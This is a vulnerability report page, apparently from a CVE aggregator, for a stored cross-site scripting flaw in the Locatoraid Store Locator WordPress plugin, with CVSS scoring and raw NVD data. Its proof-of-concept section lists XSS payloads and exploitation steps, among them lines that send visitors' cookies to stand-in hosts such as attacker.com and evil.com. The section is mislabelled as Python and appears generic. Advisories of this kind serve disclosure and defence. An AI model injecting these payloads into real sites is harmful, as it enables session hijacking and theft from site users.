Security Vulnerability Report
中文
CVE-2025-62140 CVSS 5.9 MEDIUM

CVE-2025-62140

Published: 2025-12-31 14:15:53
Last Modified: 2026-04-23 15:34:37

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in plainware Locatoraid Store Locator locatoraid allows Stored XSS.This issue affects Locatoraid Store Locator: from n/a through <= 3.9.68.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Locatoraid Store Locator <= 3.9.68 (所有版本至3.9.68)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-62140 PoC - Locatoraid Store Locator Stored XSS --> <!-- Attacker with high privileges creates/edits store location --> <!-- Payload in store name field --> <script>alert(document.cookie)</script> <!-- Alternative payload for cookie stealing --> <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> <!-- Stored XSS via location description --> <svg/onload=fetch('https://attacker.com/log?data='+btoa(document.cookie))> <!-- Steps to exploit: --> <!-- 1. Login to WordPress with admin/editor privileges --> <!-- 2. Navigate to Locatoraid > Add New Location --> <!-- 3. Enter XSS payload in Store Name, Address, or Description field --> <!-- 4. Save the location --> <!-- 5. When any user visits the store locator page, XSS executes --> <!-- Example malicious payload for store name --> Store Name: <script>var img=new Image();img.src='https://evil.com/log?c='+document.cookie;</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62140", "sourceIdentifier": "[email protected]", "published": "2025-12-31T14:15:53.363", "lastModified": "2026-04-23T15:34:36.980", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in plainware Locatoraid Store Locator locatoraid allows Stored XSS.This issue affects Locatoraid Store Locator: from n/a through <= 3.9.68."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en Plainware Locatoraid Store Locator permite XSS Almacenado. Este problema afecta a Locatoraid Store Locator: desde n/d hasta 3.9.65."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/locatoraid/vulnerability/wordpress-locatoraid-store-locator-plugin-3-9-65-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}